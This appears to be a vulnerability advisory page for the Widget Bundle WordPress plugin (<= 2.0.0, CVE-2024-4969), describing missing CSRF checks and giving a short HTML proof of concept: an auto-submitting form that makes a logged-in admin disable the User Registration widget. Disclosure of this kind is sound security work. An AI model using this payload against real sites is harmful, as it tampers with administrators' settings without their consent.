Lucene search
Bob MatyasWPEX-ID:1A7EC5DC-EDA4-4FED-9DF9-F41D2B937FEDHistoryMay 31, 2024 - 12:00 a.m.
Widget Bundle <= 2.0.0 - Widget Disable/Enable via CSRF
2024-05-3100:00:00
Bob Matyas
6
widget bundle 2.0.0
csrf
user registration widget
html exploit
admin
widget disable
Description The plugin does not have CSRF checks when logging Widgets, which could allow attackers to make logged in admin enable/disable widgets via a CSRF attack
This PoC disables the User Registration widget. To do so, make a logged in admin open an HTML file containing:
```
<body onload="document.forms[0].submit()">
<form action="https://example.com/wp-admin/admin.php?page=widget-bundle" method="post">
<input type="hidden" name="widget_options[widget_types][widget_login_register]" value="0" />
<input type="hidden" name="widget_types_submit" value="Save" />
<input type="submit" value="Submit" />
</form>
</body>
```Related
wpvulndb
wpvulndb
Widget Bundle <= 2.0.0 - Widget Disable/Enable via CSRF
2024-05-31 00:00:00
nvd
nvd
CVE-2024-4969
2024-06-21 06:15:12
cve
cve
CVE-2024-4969
2024-06-21 06:15:12
cvelist
cvelist
CVE-2024-4969 Widget Bundle <= 2.0.0 - Widget Disable/Enable via CSRF
2024-06-21 06:00:05
wordfence
wordfence
6.6 Medium
AI Score
Confidence
High
0.0005 Low
EPSS
Percentile
17.1%
Related for WPEX-ID:1A7EC5DC-EDA4-4FED-9DF9-F41D2B937FED